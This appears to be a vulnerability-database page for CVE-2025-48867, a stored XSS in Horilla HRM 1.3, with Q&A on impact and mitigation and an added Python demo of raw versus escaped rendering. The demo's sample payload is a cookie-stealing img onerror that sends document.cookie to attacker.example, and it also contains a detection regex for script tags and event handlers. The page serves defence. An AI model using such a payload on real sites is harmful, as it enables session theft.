CVE-2025-48867
BaseFortify
Publication date: 2025-09-24
Last updated on: 2025-09-29
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| horilla | horilla | 1.3 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability is a stored cross-site scripting (XSS) issue in Horilla HRM 1.3.0. An authenticated admin or other privileged user can enter JavaScript into multiple text fields of the Project and Task modules. The input is stored unneutralized in the database and is rendered into the page, so the script runs in the browser of any other admin or privileged user who later views the affected project or task. Because the attacker already needs privileged access, the practical value of the bug is persistence and lateral movement between privileged accounts rather than initial access.
How can this vulnerability impact me?
The vulnerability can lead to session hijacking and unauthorized actions within high-privilege accounts. Since the injected script executes in the context of a privileged user's session, an attacker can steal session cookies where they are not marked HttpOnly, and even where they are, the script can still issue requests as the victim (reading any CSRF token from the page) to create users, change roles, or alter HR records, compromising the security of the HRMS.
What immediate steps should I take to mitigate this vulnerability?
Since there is no known patch available at the time of publication, immediate mitigation steps include restricting access to the Project and Task modules to only trusted and necessary privileged users, reviewing the templates and views that display these fields so that stored values are HTML-escaped on output, and auditing existing Project and Task records for stored script-like content. A Content-Security-Policy that disallows inline script limits what an injected payload can do, and marking the session cookie HttpOnly blocks the simplest cookie-theft payloads. Monitoring for suspicious activity by privileged users and educating admin users about the risk of stored XSS further reduce the exposure.
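The following is an added example and not Horilla's own code or the fix for this CVE. It shows the two halves of the issue described above: a stored Project record rendered into HTML raw versus HTML-escaped, and a small audit that flags stored records carrying script-like content (the "review existing records" step). The record shape, the function names and the payload are constructed for illustration; Horilla is a Django application, and in a Django template the raw path corresponds to `|safe`, `mark_safe()` or `{% autoescape off %}`, while the escaped path is the default behaviour.

```python
"""Stored XSS in a rendered field: raw vs escaped output, plus an audit.

Added example (not Horilla's code). Record layout and helper names are
assumptions made for illustration.
"""
import html
import re

# Constructed sample records, as a privileged user might save them.
PAYLOAD = "<img src=x onerror=\"fetch('//attacker.example/?c='+document.cookie)\">"
RECORDS = [
    {"id": 1, "title": "Q3 Launch", "description": "Ship the new portal"},
    {"id": 2, "title": "Onboarding", "description": "Plan " + PAYLOAD},
    {"id": 3, "title": "Audit", "description": "Review on Monday"},
]
TEXT_FIELDS = ("title", "description")


def render_raw(record: dict) -> str:
    """Vulnerable pattern: the stored value is concatenated into the page
    unchanged, equivalent to marking it safe in a Django template."""
    return (
        '<div class="card"><h3>{title}</h3><p>{description}</p></div>'
        .format(title=record["title"], description=record["description"])
    )


def render_escaped(record: dict) -> str:
    """Hardened pattern: every stored value is HTML-escaped at output time,
    which is what Django's autoescaping does by default."""
    return (
        '<div class="card"><h3>{title}</h3><p>{description}</p></div>'
        .format(
            title=html.escape(record["title"], quote=True),
            description=html.escape(record["description"], quote=True),
        )
    )


def payload_is_live(rendered: str) -> bool:
    """True if the rendered page still contains an unescaped tag with an
    event handler, i.e. markup the browser would execute."""
    return re.search(r"<\s*\w+[^>]*\son\w+\s*=", rendered, re.I) is not None


# Heuristic for auditing stored data: opening tags of script-bearing
# elements, inline event handlers, or javascript: URLs. It is a triage
# filter for a human to review, not a sanitizer.
SUSPICIOUS = re.compile(
    r"<\s*(script|img|svg|iframe|object|embed|body|math)\b"
    r"|\bon[a-z]+\s*="
    r"|javascript\s*:",
    re.I,
)


def audit_records(records, fields=TEXT_FIELDS):
    """Return (record id, field, matched text) for every stored value that
    looks like it carries markup that could execute when rendered."""
    findings = []
    for rec in records:
        for field in fields:
            value = rec.get(field) or ""
            m = SUSPICIOUS.search(value)
            if m:
                findings.append((rec.get("id"), field, m.group(0)))
    return findings


if __name__ == "__main__":
    victim_view = RECORDS[1]
    print("raw   :", render_raw(victim_view))
    print("escaped:", render_escaped(victim_view))
    print("live payload in raw?    ", payload_is_live(render_raw(victim_view)))
    print("live payload in escaped?", payload_is_live(render_escaped(victim_view)))
    print("audit findings:", audit_records(RECORDS))
```

Escaping on output keeps the data intact (`html.unescape` of the escaped card returns the original text) while removing its ability to execute; the audit is only a triage aid and will not catch every encoding trick, so any hit should be reviewed by hand rather than trusted as a complete inventory.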
Since there is no known patch available at the time of publication, immediate mitigation steps include restricting access to the Project and Task modules to only trusted and necessary privileged users, avoiding the input of untrusted data into these fields, and monitoring for suspicious activity by privileged users. Additionally, educating admin users about the risk of stored XSS and encouraging them to avoid clicking on suspicious links or inputs within the HRM interface can help reduce risk.